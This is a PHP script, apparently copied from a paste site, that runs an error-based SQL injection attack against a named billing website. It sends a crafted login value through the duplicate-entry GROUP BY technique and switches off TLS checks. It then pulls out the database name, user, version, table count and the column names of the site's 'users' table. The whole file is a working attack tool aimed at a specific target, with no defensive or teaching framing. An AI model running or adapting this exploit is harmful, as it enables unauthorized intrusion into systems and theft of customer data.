php set_time_limit false ignore_user_abort true site https billing zug

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
set_time_limit(false);
ignore_user_abort(true);
$site = 'https://billing.zugres.net';
function query($site, $query) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $site,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false
));
curl_setopt_array($ch, array(
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array(
'card' => rand(100000, 999999),
'login' => "' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(($query), 1, 63), FLOOR(RAND(0)*2))) -- '",
'password' => '',
'act' => '1'
)
));
$res = iconv('koi8-r', 'UTF-8', curl_exec($ch));
preg_match('/Duplicate entry \'(.*?)\d\'/', $res, $data);
return $data[1];
}
$db = query($site, 'database()');
$user = query($site, 'user()');
$version = query($site, 'version()');
$c_tables = query($site, 'SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=\''.$db.'\'');
echo '<b>Host: </b> ' . $site . '<br/>';
echo '<b>Database: </b> ' . $db . '<br/>';
//echo '<b>User: </b> ' . $user . '<br/>';
//echo '<b>MySQL Version: </b> ' . $version . '<br/>';
//echo '<b>Count tables: </b> ' . $c_tables . '<br/>';
/*echo '<b>Tables:</b><pre>' . "\n-----\n";
$tables = [];
for($i = 0; $i < $c_tables; $i++) {
$tables[] = query($site, 'SELECT table_name FROM information_schema.tables WHERE table_schema=\''.$db.'\' LIMIT '.$i.',1');
echo $tables[$i] . "\n";
}
echo '-----</pre>';*/
$c_users = query($site, 'SELECT COUNT(*) FROM information_schema.columns WHERE table_name=\'users\''); //count columns
echo '<b>Columns table `users`:</b><pre>' . "\n-----\n";
for($i = 0; $i < $c_users; $i++)
echo query($site, 'SELECT column_name FROM information_schema.columns WHERE table_name=\'users\' LIMIT '.$i.',1') . "\n";
echo '-----</pre>';